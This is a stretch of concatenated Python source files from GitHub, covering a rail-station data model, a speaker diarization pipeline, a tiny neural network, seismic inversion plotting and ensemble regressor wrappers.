active_ids(cls):\n memcache_key = '%s_active_ids' % cls.__name__\n ids_list = memcache.get(memcache_key)\n if not ids_list:\n ids_list = []\n for key in cls.query().filter(TSStation.importance <= 3).iter(keys_only=True):\n ids_list.append(key.id())\n memcache.set(memcache_key, ids_list)\n return ids_list\n\n @classmethod\n def id_for_name(cls, name):\n try:\n return cls.valid_identifier(name)\n except NoValidIdentifierError:\n for key in cls.query().filter(TSStation.names == name).iter(keys_only=True):\n return key.id()\n\n # ------------ Object properties -----------------------------------------------------------------------------------\n\n @property\n def name(self):\n if self.names:\n return self.names[0]\n\n @name.setter\n def name(self, new_name):\n current_display_name = self.display_name\n updated_names = [new_name]\n for existing_name in self.names:\n if existing_name != new_name:\n updated_names.append(existing_name)\n self.names = updated_names\n if current_display_name:\n self.display_name = current_display_name\n\n @property\n def display_name(self):\n if self.names and len(self.names) > self.display_index:\n return self.names[self.display_index]\n\n @display_name.setter\n def display_name(self, new_display_name):\n found = False\n for i in range(len(self.names)):\n if self.names[i] == new_display_name:\n self.display_index = i\n found = True\n break\n if not found:\n self.display_index = len(self.names)\n self.names.append(new_display_name)\n\n def add_alias(self, new_alias):\n if new_alias in self.names:\n return False\n else:\n self.names.append(new_alias)\n return True\n\n @property\n def wiki_link(self):\n if self.wiki_string:\n components = self.wiki_string.split(':')\n if len(components) == 2:\n string_with_underscores = re.sub(' ', '_', components[1])\n return 'http://%s.wikipedia.org/wiki/%s' % (components[0], string_with_underscores)\n\n @property\n def agent(self):\n return TSStationAgent.get(self.id_)\n\n @property\n def positions(self):\n if self._positions is not None:\n return self._positions\n else:\n self._positions = TSStationPosition.query(TSStationPosition.station_key == self.key).fetch(20)\n return self._positions\n\n def create_position(self, route_code):\n self._positions = None\n return TSStationPosition.new(station_code=self.code, route_code=route_code)\n\n # ------------ Reading content -------------------------------------------------------------------------------------\n\n @classmethod\n def xml_handler(cls):\n return StationImporter()\n\n @classmethod\n def update_stations(cls, file_name=None):\n \"\"\"\n Updates the current stations with xml-formatted data either from NS-API or a specified file.\n Stations that don't appear in the new data will be deleted.\n :param file_name: Name of the source ('None' redirects to NS-API)\n \"\"\"\n if file_name:\n fp = open(file_name, 'r')\n xml_string = fp.read()\n else:\n xml_string = remote_fetch(url=config.NSAPI_STATIONS_URL,\n headers=config.NSAPI_HEADER,\n deadline=config.NSAPI_DEADLINE)\n cls.update_multi(xml_string, DataType.xml)\n\n def update_with_dictionary(self, dictionary):\n changes = False\n\n names = dictionary.get('names')\n if names is None:\n name = dictionary.get('name')\n alias = dictionary.get('alias')\n if alias:\n if self.add_alias(name):\n changes = True\n else:\n if self.name != name:\n self.name = name\n changes = True\n\n if len(self.positions) == 0:\n lat = dictionary.get('lat')\n lon = dictionary.get('lon')\n if lat is not None and lon is not None:\n self.update_positions([{'km': 0.0, 'route': 'nl.xx00', 'lat': lat, 'lon': lon}])\n changes = True\n\n else:\n if names != self.names:\n self.names = names\n changes = True\n\n display_index = dictionary.get('displayIndex')\n if display_index != self.display_index:\n self.display_index = display_index\n changes = True\n\n label_angle = dictionary.get('labelAngle')\n if label_angle != self.label_angle:\n self.label_angle = label_angle\n changes = True\n\n wiki_string = dictionary.get('wikiString')\n if wiki_string != self.wiki_string:\n self.wiki_string = wiki_string\n changes = True\n\n opened_string = dictionary.get('openedString')\n if opened_string != self.opened_string:\n self.opened_string = opened_string\n changes = True\n\n if self.update_positions(dictionary.get('positions', [])):\n changes = True\n\n importance = dictionary.get('importance')\n if importance is not None and importance != self.importance:\n self.importance = importance\n changes = True\n elif importance is self.importance is None:\n self.importance = 3\n changes = True\n\n return changes\n\n def update_positions(self, new_positions):\n changes = False\n old_positions = self.positions\n all_positions = []\n updated_positions = []\n for dictionary in new_positions:\n current_position = None\n route_id = dictionary['route']\n for position in old_positions:\n if position.route_id == route_id:\n current_position = position\n break\n if current_position is not None:\n old_positions.remove(current_position)\n else:\n route_code = route_id.split('.')[1]\n current_position = self.create_position(route_code)\n\n current_changes = False\n km = dictionary['km']\n if current_position.km != km:\n current_position.km = km\n current_changes = True\n coordinate = (dictionary['lat'], dictionary['lon'])\n if current_position.coordinate != coordinate:\n current_position.coordinate = coordinate\n current_changes = True\n all_positions.append(current_position)\n if current_changes:\n changes = True\n updated_positions.append(current_position)\n self._positions = None\n for position in old_positions:\n position.delete()\n if updated_positions:\n ndb.put_multi(updated_positions)\n return changes\n\n # ------------ Writing content -------------------------------------------------------------------------------------\n\n @property\n def xml(self):\n return XMLElement('station', {'id': self.id_, 'name': self.name, 'importance': self.importance})\n\n @property\n def xml_document(self):\n document = XMLDocument('routeItems')\n document.root.add(self.xml)\n return document\n\n def dictionary_from_object(self):\n dictionary = {'id': self.id_}\n\n if self.names is not None:\n dictionary['names'] = self.names\n\n if self.display_index is not None:\n dictionary['displayIndex'] = self.display_index\n\n if self.label_angle is not None:\n dictionary['labelAngle'] = self.label_angle\n\n if self.importance is not None:\n dictionary['importance'] = self.importance\n\n if self.wiki_string is not None:\n dictionary['wikiString'] = self.wiki_string\n\n if self.opened_string is not None:\n dictionary['openedString'] = self.opened_string\n\n positions = []\n for position in self.positions:\n positions.append(position.dictionary_from_object(perspective='station'))\n if positions:\n dictionary['positions'] = positions\n\n return dictionary\n\n\n# ====== XML Parser ====================================================================================================\n\nclass StationImporter(XMLImporter):\n\n now = None\n from_rail_atlas = False\n name = None\n code = None\n country = None\n alias = False\n importance = None\n lat = None\n lon = None\n\n def active_xml_tags(self):\n return ['station']\n\n def existing_objects_dictionary(self):\n return TSStation.objects_dictionary()\n\n def key_for_current_object(self):\n if self.code and self.country == 'nl':\n return '%s.%s' % (self.country, self.code)\n\n def create_new_object(self, key):\n return TSStation.new(key)\n\n def start_xml_element(self, name, attrs):\n if name == 'routeItems':\n self.from_rail_atlas = True\n\n elif name == 'TAStation':\n self.from_rail_atlas = True\n\n elif name == 'station':\n if self.from_rail_atlas:\n identifier = attrs.get('id')\n comps = identifier.split('.')\n self.country = comps[0]\n self.code = comps[1]\n self.name = attrs.get('name')\n self.importance = int(attrs.get('importance'))\n\n elif name == 'unit_test':\n now_string = attrs.get('timestamp')\n self.now = cet_from_string(now_string)\n\n def end_xml_element(self, name):\n if not self.from_rail_atlas:\n if name == 'name':\n self.name = ''.join(self.data)\n\n elif name == 'code':\n self.code = ''.join(self.data).lower()\n\n elif name == 'country':\n self.country = ''.join(self.data).lower()\n\n elif name == 'alias':\n string = ''.join(self.data).lower()\n if string == 'true':\n self.alias = True\n else:\n self.alias = False\n\n elif name == 'lat':\n self.lat = float(''.join(self.data))\n\n elif name == 'long':\n self.lon = float(''.join(self.data))\n\n def update_object(self, existing_object, name):\n dictionary = {'alias': self.alias,\n 'name': self.name,\n 'importance': self.importance,\n 'lat': self.lat,\n 'lon': self.lon}\n if existing_object.update_with_dictionary(dictionary):\n self.changes = True\n\n def save_objects(self):\n assert len(self.old_objects) < 10\n if self.updated_objects:\n ndb.put_multi(self.updated_objects.values())\n for station in self.old_objects.itervalues():\n station.delete()\n\n","repo_name":"firstflamingo/treinenaapje","sub_path":"app/TSStation.py","file_name":"TSStation.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72441161093","text":"import random\nimport sys\nimport os\nsys.path.insert(0,'./..')\nimport numpy as np\nimport math\nimport soundfile as sf\nfrom python_speech_features import mfcc\nfrom numpy.linalg import inv\nfrom peakdetect import peakdet\nfrom readcsv import getcsvfeat\nimport webrtcvad\nfrom seg_vad import segmentvad\nfrom clus_vad import clus_vad1\nfrom bic_single_gaus import bicdist_single\nfrom funcVAD import vadfn\nfrom SpecchSEgs import getSpeechSEgments\nfrom read import readVADFile\nfrom clus_vad_spk import clus_vad1_spk\n\n\ndef diar_vad(wav_file,feat_file,pfo,pflin,tag,numfrwin,nsh,MDT,vadtxt,spkrs,filetype,verbose,feattype,amplitude,dist_1):\n\n\n #Making a webrtcvad Object. For more information , Visit: https://github.com/wiseman/py-webrtcvad\n vad = webrtcvad.Vad()\n vad.set_mode(0) #Setting Mode 0 of 'Aggresiveness'. Visit: https://github.com/wiseman/py-webrtcvad\n\n x, fs = sf.read(wav_file)\n #Reading The wav File. x=array of samples of the wav file(decimal). fs= sampling frequency\n\n\n #Feature Extraction\n\n\n\n\n if(feattype=='csv'):\n \n if(feat_file=='NoneProvided'):\n\n #If no external Features Provided by the User, System will extract the feature using python_speech_features Library.\n #More information on the Library : https://github.com/jameslyons/python_speech_features\n #x=wav file(array of decimals)\n #fs=sampling Frequency\n #0.03=Window Size in seconds ; AKA 30mS\n #0.01=Window Shift in seconds ; AKA 10ms\n #13= Dimension of MFCC Feature\n \n feat = mfcc(x,fs,0.03,0.010,13)\n feat= feat.transpose()#feat-->FEATURE VARIABLE. Shape=(dimension, samples)\n \n nsh=0.010 #nsh Variable--> Indiactes window shift interval\n print('using Inbuilt MFFCs as features')\n else:\n feat=getcsvfeat(feat_file) #Gets the features from the CSV File path which is provided\n #feat-->FEATURE VARIABLE. Shape=(dimension, samples) \n\n #When CSV File is provided, but the Window SHift AKA nsh is not provided (nsh==1 by default(see DIAR_MAIN.py)), throw an ERROR\n \n if(nsh==1):\n print('ERROR, please enter -res (Window Shift) as Features are provided')\n sys.exit()\n print('Using provided Features')\n \n elif(feattype=='numpy'):\n feat=feat_file\n else:\n print('ERROR, please ENTER Feature options correctly . (feattype)-->indicate numpy or csv')\n sys.exit()\n \n \n \n \n\n #get the Frame By Frame VAD Output(For each overlapping frame, do VAD and get '1==speech' or '0==no Speech' For each overlapping frame\n\n if(vadtxt=='1'):\n vad_flag,feat_1,numfram=vadfn(x,nsh,fs,feat)\n print('Performing VAD')\n #vadtxt-->Filename containing VAD Information.If no File Name provided, vadtxt=1 by default. If no file given, perform VAD.\n #feat---> feature file (Dim,sample)\n #vadfn --> performs VAD using the webrtcvad Library\n #vad_flag--> Frame by Frame VAD info for each overlapping frame.Eg. vad_flag= array[1 0 0 0 1 1 1 0 1 0 1 1 1 0 0.......]\n #numfram-->Number of samples(feature samples) taken into account. numfram= min(number of VAD samples, Number of Feature Samples). Done to avoid Mismatch\n #feat_1-->Returns features with 'numfram' samples . len(feat_1)=numfram\n \n \n \n else:\n vad_flag,feat_1,numfram=readVADFile(vadtxt,feat)\n #vadtxt-->Filename containing VAD Information.\n #vad_flag--> Frame by Frame VAD info for each overlapping frame.Eg. vad_flag= array[1 0 0 0 1 1 1 0 1 0 1 1 1 0 0.......]\n #numfram-->Number of samples(feature samples) taken into account. numfram= min(number of VAD samples, Number of Feature Samples). Done to avoid Mismatch\n #feat_1-->Returns features with 'numfram' samples .len(feat_1)=numfram\n print('Number of VAD Samples : '+str(len(vad_flag)))\n print('Number of Extracted Feature Samples : '+str(len(feat[1,:])))\n print('Number of Samples Considered : '+str(numfram)) \n\n speech_seg,speech_seg_start,speech_seg_end=getSpeechSEgments(vad_flag,MDT,feat_1,numfram)\n #getSpeechSEgments--> Analyses the VAD information and gets only the SPEECH Segments.\n #MDT-->Minimum Duration Time. Used for smoothing out the VAD output. if Silence Time<MDT----> Treat as Voice\n\n #speech_seg--> Returns Speech Segment windows.\n #Each Segment --> Features of the 'Voiced Part'.\n #eg. ---> speech_seg[0].shape=(13,4562) ; speech_seg[1].shape=(13,2341). speech_seg[i]-->returns 'ith' Speech Segment\n #speech_seg_start-->Start Time of Each Speech Segment\n #speech_seg_end-->End Time of Each Speech Segment\n\n\n clus_final=[]#Will contain the various speech segments AFTER Segmentation+Linear Clustering\n frms_start=[]#Start Frame of each speech segment after Segmentation+Linear Clustering\n frms_end=[]#End Frame of each speech segment after Segmentation+Linear Clustering\n\n #Performing Segmentation + Linear Clustering in Each of the Speech Segments\n for u in range(0,len(speech_seg)):\n \n x,y=speech_seg[u].shape\n #y--->Number of Samples in 'speech_seg[u]'\n \n if(y<(numfrwin+30)):#If Number of samples<numfrwin+30, DONT do segmentation+Linear CLustering. Add the entire speech segment. eg., if numfram=100,and nsh=0.010; 130*0.010=1.3s. If segment size less than 1.3s, add entire segment as it is\n \n clus_final.append(speech_seg[u])\n frms_start.append(speech_seg_start[u])\n frms_end.append(speech_seg_end[u])\n else:\n time_stamp,frame_stamp,ts_lin,fs_lin,clus,cluslin=segmentvad( speech_seg[u],amplitude,dist_1,numfrwin,nsh,pflin,fs)\n #segmentvad-->Does Segmeatation followed by linear clustering on the speech segments.\n\n #Outputs\n #time_stamp-->Time Stamp of change points followed by ONLY Segmentation\n #frame_stamp-->Frame Stamp of change points followed by ONLY Seg,Segmentation\n #ts_lin-->Time Stamp of change points followed by Segmentation AND Linear Clustering\n #fs_lin-->Frame Stamp of change points followed by Segmentation AND Linear Clustering\n #clus-->Speech Clusters followed by ONLY Segmentation\n #cluslin-->Speech Clusters followed by Segmentation AND Linear Clustering\n\n #Inputs\n #speech_seg[i]--->ith speech segment\n #amplitude-->Amplitude Threshold for Peak Detection ( See documentation of peakdetect.py for more information)\n #dist_1-->Distance Threshold for Peak Detection ( See documentation of peakdetect.py for more information)\n #numfrwin--> Segmentation Window Size. eg. numfrwin=100;nsh=0.010 ;Segmentation Window= 100*0.010=1s\n #nsh--> frame shift (0.010 default)\n #pflin--> Penalty Factor For Linear CLustering.(in BIC formula)\n #fs-->sampling frequency\n \n \n \n for t in range(0,len(cluslin)):\n clus_final.append(cluslin[t])\n\n #calculating Frame Start and Frame End for each 'segmented+Linear clustered' speech segment\n if(len(cluslin)==1):\n frms_start.append(speech_seg_start[u])\n frms_end.append(speech_seg_end[u])\n \n else:\n \n \n nst=0\n nen=fs_lin[0]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n \n\n if(len(fs_lin)==1):\n nst=fs_lin[0]\n nen=speech_seg_end[u]-speech_seg_start[u]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n else:\n for y in range(1,len(fs_lin)):\n nst=fs_lin[y-1]\n nen=fs_lin[y]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n nst=fs_lin[len(fs_lin)-1]\n nen=speech_seg_end[u]-speech_seg_start[u]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n \n \n \n\n #Performing Hierarchical Clustering on the Speech Signals\n #Two ways of terminating Clustering\n if(spkrs=='None'):\n clusters_spkrs=clus_vad1(clus_final,pfo,tag,verbose) #End Point of Clustering is based on BIC Value; If delta(BIC)>0; Stop Merging.\n #clusters_spkrs----> The Final CLusters of the speakers AFTER Hierarchical CLustering\n else:\n clusters_spkrs=clus_vad1_spk(clus_final,pfo,tag,int(float(spkrs)),verbose)#End Point of Clustering ---> Number of clusters= Number of speakers\n #clusters_spkrs----> The Final CLusters of the speakers AFTER Hierarchical CLustering\n \n for k in range(len(clusters_spkrs)):\n print(clusters_spkrs[k].shape)\n\n \n flag_pt=[]\n #Doing Speaker Matching; comparing each speech segment with the speaker clusters and assign speaker ID\n for i in range(0,len(clus_final)):\n kld=[]\n for j in range(0,len(clusters_spkrs)): #all the spkr clusters\n \n kld.append(bicdist_single(clus_final[i],clusters_spkrs[j],pfo))\n \n klin=min(kld)\n index=kld.index(klin)\n flag_pt.append(index)#flag_pt contains speaker ID\n \n\n\n #Write to File\n pf1=pfo\n str12='./results/'+tag+'_'+str(spkrs)+'_'+str(pfo)+'_'+str(pflin)+'.txt'\n text_file = open(str12, \"w\")\n\n data_time=np.zeros((len(clus_final),3))\n data_frame=np.zeros((len(clus_final),3))\n \n for i in range(0,len(clus_final)):\n \n start=frms_start[i]*nsh\n end=frms_end[i]*nsh\n dur=end-start\n \n spkid=flag_pt[i]\n data_time[i,0]=spkid\n data_time[i,1]=start\n data_time[i,2]=end-nsh\n\n data_frame[i,0]=spkid\n data_frame[i,1]=frms_start[i]\n data_frame[i,2]=frms_end[i]-1\n if(filetype=='rttm'):\n str1='SPEAKER '+ tag+' 1 '+str(start)+' '+str(dur)+' <NA> <NA> '+str(spkid)+' <NA> <NA>'\n text_file.write(str1+\"\\n\")\n## else:\n## str1='SP'+str(spkid)+' '+str(frms_start[i])+' '+str(frms_end[i])\n## text_file.write(str1+\"\\n\")\n\n \n #print(str(len(feat[1,:]))+' feat_1 '+str(len(feat_1[1,:])))\n data_perfrm=[]\n if(data_frame[0,1]!=0):\n for j in range(0,data_frame[0,1]):\n data_perfrm.append('SIL')\n \n \n\n\n datafrm_sil=[]\n datatim_sil=[]\n for i in range(0,len(data_frame[:,1])):\n\n size=data_frame[i,2]-data_frame[i,1]+1\n datafrm_sil.append(data_frame[i])\n datatim_sil.append(data_time[i])\n\n for k in range(0,int(size)):\n data_perfrm.append(data_frame[i,0])\n \n\n if(i<len(data_frame[:,1])-1):\n \n size2=data_frame[i+1,1]-data_frame[i,2]\n \n if(size2>1):\n tmp=np.array(['SIL',data_frame[i,2]+1,data_frame[i+1,1]-1])\n datafrm_sil.append(tmp) \n tmp2=np.array(['SIL',(data_frame[i,2]+1)*nsh,(data_frame[i+1,1]-1)*nsh])\n datatim_sil.append(tmp2)\n for j in range(0,int(size2)-1):\n data_perfrm.append('SIL')\n \n \n \n \n \n datafrm_sil=np.array(datafrm_sil)\n datatim_sil=np.array(datatim_sil)\n\n for n in range(0,len(datafrm_sil)):\n if(filetype!='rttm'):\n if(datafrm_sil[n,0]!='SIL'):\n str1='SP'+str(int(float(datafrm_sil[n,0])))+' '+str((datafrm_sil[n,1]))+' '+str((datafrm_sil[n,2]))\n text_file.write(str1+\"\\n\")\n else:\n str1=str((datafrm_sil[n,0]))+' '+str((datafrm_sil[n,1]))+' '+str((datafrm_sil[n,2]))\n text_file.write(str1+\"\\n\")\n \n \n \n text_file.close()\n return data_time,data_frame,data_perfrm,datafrm_sil,datatim_sil\n\n\n\n\n","repo_name":"gdebayan/Diarization_BIC","sub_path":"DIARIZATION/diarization_VAD/diarization_vad.py","file_name":"diarization_vad.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"44"} +{"seq_id":"18115674314","text":"import numpy\n\nclass Brain: \n def __init__(self, inputs):\n self.input_layers_size = inputs + 1\n self.hidden_layers_size = 3 + 1\n self.output_layers_size = 1 \n\n self.input_weights = numpy.random.randn(self.input_layers_size, self.hidden_layers_size)\n self.hidden_weights = numpy.random.randn(self.hidden_layers_size, self.output_layers_size)\n\n def sigmoid(self, x):\n return 1/(1 + numpy.exp(-x))\n\n def feedfoward(self,inputs_array):\n inputs_array.append(1)\n\n hidden_activations = self.sigmoid(numpy.dot(inputs_array,self.input_weights))\n\n hidden_activations[len(hidden_activations)-1] = 1\n\n outputs = self.sigmoid(numpy.dot(hidden_activations, self.hidden_weights))\n\n return self.sigmoid(outputs)","repo_name":"YannCedric/Birds-Neural-Net","sub_path":"Brain.py","file_name":"Brain.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37664014604","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom scipy.stats import gaussian_kde\nimport os\nfrom objective_function import (ObjectiveFunctionDerivativeUsed, Forward)\n\nimport yaml\n\nparams = {'axes.labelsize': 14,\n 'axes.titlesize': 16,\n 'xtick.labelsize': 12,\n 'ytick.labelsize': 12,\n 'legend.fontsize': 14}\nplt.rcParams.update(params)\n\n\ndef kde_scipy(x, x_grid, weights):\n if len(x) == 1:\n ret = np.zeros_like(x_grid)\n ind = np.argmin(np.abs(x[0] - x_grid))\n ret[ind] = 1.0\n else:\n if np.all(np.isclose(x, x[0])):\n x += 1.0e-10 * np.random.random(len(x))\n kde = gaussian_kde(x, weights=weights)\n ret = kde.evaluate(x_grid)\n return ret\n\n\ndef weighted_avg_and_std(values, weights):\n \"\"\"\n Return the weighted average and standard deviation.\n\n values, weights -- Numpy ndarrays with the same shape.\n \"\"\"\n average = np.average(values, weights=weights)\n # Fast and numerically precise:\n num = len(values)\n if num == 1:\n variance = 0\n else:\n variance = np.average(\n (values - average)**2, weights=weights) * num / (num - 1)\n return (average, np.sqrt(variance))\n\n\ndef plot_disp(config, sid, all_disp, file_out, no_show):\n config_plot = config['plot']\n dir_output = config['dir_output']\n wave_type = config.get('wave_type', 'rayleigh')\n dir_output = os.path.join(dir_output, sid)\n\n results = [\n np.load(dir_output + '/' + f, allow_pickle=True)\n for f in os.listdir(dir_output)\n ]\n misfit = np.asarray([r['fi'] for r in results])\n roots_inv = [r['ri'].item() for r in results]\n models_inv = [r['mi'] for r in results]\n weight = np.exp(-misfit)\n weight /= np.sum(weight)\n\n if len(weight) == 1:\n ratio_show = 1\n else:\n ratio_show = config_plot['percentage_show'] * 0.01\n num_show = int(misfit.shape[0] * ratio_show)\n ind_sort = np.argsort(weight)[::-1][:num_show]\n weight = weight[ind_sort]\n weight = weight / np.amax(weight) * 0.2\n roots_inv = [roots_inv[i] for i in ind_sort]\n models_inv = [models_inv[i] for i in ind_sort]\n\n num_show = int(misfit.shape[0] * ratio_show)\n\n # weight *= 1.0 / np.mean(weight) * 0.05\n # weight[weight > 0.1] = 0.1\n dir_data = config['dir_data']\n file_data = os.path.join(dir_data, '{:s}.txt'.format(sid))\n data = np.loadtxt(file_data)\n\n _, ax = plt.subplots()\n modes = []\n\n if all_disp:\n weights_mode = config.get(\"weights_mode\", None)\n for ind, (w, model) in enumerate(zip(weight, models_inv)):\n forward = Forward(model, data, wave_type)\n forward.compute(weights_mode)\n disp = forward.disp\n for m, val in disp.items():\n modes.append(m)\n pinv, = ax.plot(val[:, 0], val[:, 1], 'k-', alpha=w)\n else:\n for ind, (w, r) in enumerate(zip(weight, roots_inv)):\n if ind >= num_show:\n continue\n for mode, v in r.items():\n rinv = np.array(v)\n if np.size(rinv) > 0:\n pinv, = ax.plot(rinv[:, 0], rinv[:, 1], 'k-', alpha=w)\n modes.append(mode)\n\n modes = set(modes)\n for mode in modes:\n disp_m = data[data[:, 2].astype(int) == mode]\n pdata, = ax.plot(disp_m[:, 0], disp_m[:, 1], 'r.', alpha=0.5)\n\n plt.legend(handles=[pinv, pdata],\n labels=['inversion', 'data'],\n loc='lower left')\n\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Phase velocity (km/s)')\n plt.tight_layout()\n if file_out:\n plt.savefig(file_out, dpi=300)\n if not no_show:\n plt.show()\n\n\ndef plot_model(config_inv, sid, plot_init, file_out, no_show):\n config_plot = config_inv['plot']\n zmax = config_plot['zmax']\n vsmin, vsmax = config_plot['vs_lim']\n file_model_data = config_plot.get('model_data', None)\n file_model_output = config_plot.get(\"model_output\", \"model_output.txt\")\n dir_output = config_inv['dir_output']\n dir_output = os.path.join(dir_output, sid)\n file_data = '{:s}.txt'.format(sid)\n\n results = [np.load(dir_output + '/' + f) for f in os.listdir(dir_output)]\n misfit = np.asarray([r['fi'] for r in results])\n\n model_stat = np.asarray([r['mi'][:, 3] for r in results])\n model_0 = np.asarray([r['m0'][:, 3] for r in results])\n\n weight = np.exp(-misfit)\n\n if len(weight) == 1:\n ratio_show = 1\n else:\n ratio_show = config_plot['percentage_show'] * 0.01\n num_show = int(misfit.shape[0] * ratio_show)\n ind_sort = np.argsort(weight)[::-1][:num_show]\n weight = weight[ind_sort]\n weight /= np.sum(weight)\n model_stat = model_stat[ind_sort, :]\n\n if plot_init:\n model_stat = model_0[ind_sort, :]\n weight = np.ones_like(weight)\n weight /= np.sum(weight)\n file_model_data = None\n\n if zmax < 0.5:\n unit = 'm'\n km2m = 1000\n else:\n unit = 'km'\n km2m = 1\n\n plt.figure()\n\n file_model_init = config_inv['model_init']\n model_init = np.loadtxt(file_model_init)\n z = model_init[:, 1]\n hw = config_inv['init_half_width']\n vs = model_stat\n\n z_plot = np.append(z, zmax) * km2m\n wmax = np.amax(weight)\n\n labels = []\n handles = []\n for i in range(vs.shape[0]):\n vs_plot = np.append(vs[i, :], vs[i, -1])\n alpha = weight[i] / wmax * 0.2\n p1, = plt.step(vs_plot, z_plot, 'k-',\n alpha=alpha, linewidth=2)\n\n handles.append(p1)\n if plot_init:\n labels.append('initial model')\n else:\n labels.append('inverted model')\n\n ml = []\n sl = []\n zl = []\n for i in range(vs.shape[1]):\n mean, std = weighted_avg_and_std(vs[:, i], weight)\n ml.append(mean)\n sl.append(std)\n zl.append((z_plot[i] + z_plot[i + 1]) / 2.0)\n\n mp = ml[:] + [\n ml[-1],\n ]\n zp = z_plot[:]\n if not plot_init:\n p2, = plt.step(mp, zp, '-', c='r', alpha=0.8, linewidth=2)\n handles.append(p2)\n labels.append('estimated model')\n\n vs_init = model_init[:, 3]\n hw = config_inv['init_half_width']\n v1, v2 = vs_init - hw, vs_init + hw\n vs1_plot = np.append(v1, v1[-1])\n vs2_plot = np.append(v2, v2[-1])\n plt.step(vs1_plot,\n z_plot,\n '--',\n c='gray',\n alpha=0.8)\n plt.step(vs2_plot, z_plot, '--', c='gray', alpha=0.8)\n\n of = ObjectiveFunctionDerivativeUsed(config_inv, file_data)\n x = (np.asarray(ml) - v1) / (v2 - v1)\n model = of._update_model(x)\n std = np.asarray(sl).reshape(-1, 1)\n model = np.hstack((model, std))\n fmt = \"%5d%12.6f%12.6f%12.6f%12.6f%12.6f\"\n np.savetxt(file_model_output, model, fmt=fmt)\n print((\"{:>7s}\" + \"{:>12s}\" * 5).format('No.', 'z', 'rho', 'vs', 'vp',\n 'std'))\n for i in range(model.shape[0]):\n print((\"{:7.0f}\" + \"{:12.4f}\" * 5).format(*model[i, :]))\n\n if file_model_data:\n model_data = np.loadtxt(file_model_data)\n z = model_data[:, 1]\n z = np.append(z, [\n zmax,\n ]) * km2m\n vs = model_data[:, 3]\n vs = np.append(vs, [\n vs[-1],\n ])\n p3, = plt.step(vs,\n z,\n '-',\n c='b',\n alpha=0.6,\n linewidth=2)\n handles.append(p3)\n labels.append('data model')\n\n if plot_init:\n file_model_init = config_inv['model_init']\n model_init = np.loadtxt(file_model_init)\n z = model_init[:, 1]\n z = np.append(z, [\n zmax,\n ]) * km2m\n vs = model_init[:, 3]\n vs = np.append(vs, [\n vs[-1],\n ])\n p4, = plt.step(vs, z, 'r-', alpha=0.6)\n handles.append(p4)\n labels.append('reference model')\n\n plt.legend(handles, labels, loc='lower left')\n\n if plot_init:\n plt.title('initial model distribution')\n\n plt.xlim([vsmin, vsmax])\n plt.ylim([0, zmax * km2m])\n plt.xlabel('Vs (km/s)')\n plt.ylabel('Depth ({:s})'.format(unit))\n plt.gca().invert_yaxis()\n plt.tight_layout()\n if file_out:\n plt.savefig(file_out, dpi=300)\n if not no_show:\n plt.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='plot inversion result')\n parser.add_argument('-c', '--config', default='config_inv.yml')\n parser.add_argument('--data', help='data name')\n parser.add_argument('--plot_model', action='store_true')\n parser.add_argument('--plot_disp', action='store_true')\n parser.add_argument('--all_disp', action='store_true')\n parser.add_argument('--plot_init', action='store_true')\n parser.add_argument('--out', default=None,\n help='filename of output figure')\n parser.add_argument('--no_show', action='store_true')\n args = parser.parse_args()\n file_config = args.config\n dataname = args.data\n show_model = args.plot_model\n show_disp = args.plot_disp\n all_disp = args.all_disp\n show_init = args.plot_init\n file_out = args.out\n no_show = args.no_show\n\n with open(file_config, 'r') as fp:\n config = yaml.safe_load(fp)\n\n if show_model:\n plot_model(config, dataname, show_init, file_out, no_show)\n if show_disp:\n plot_disp(config, dataname, all_disp, file_out, no_show)\n","repo_name":"pan3rock/DisbaTomo","sub_path":"python/plot_inversion.py","file_name":"plot_inversion.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"44"} +{"seq_id":"25201045370","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 29 10:23:13 2018\n\n@author: hendrawahyu\n\"\"\"\n\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\n\nimport numpy as np\n\n### Classifier Models ###\nclass Classifier(object):\n def __init__(self, models, seed = 0, params = None):\n params['random_state'] = seed\n self.models = models(**params)\n \n def train(self, X, y):\n self.models.fit(X, y)\n \n def predict(self, X):\n return self.models.predict(X)\n \n def fit(self,X,y):\n return self.models.fit(X,y)\n \n def feature_importances(self,X,y):\n print(self.models.fit(X,y).feature_importances_)\n\n\n### Stacking Regressor models ###\nclass StackingAveragedRegressor(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n #Do the predictions of all base models on the test data and use the averaged predictions as \n #meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in 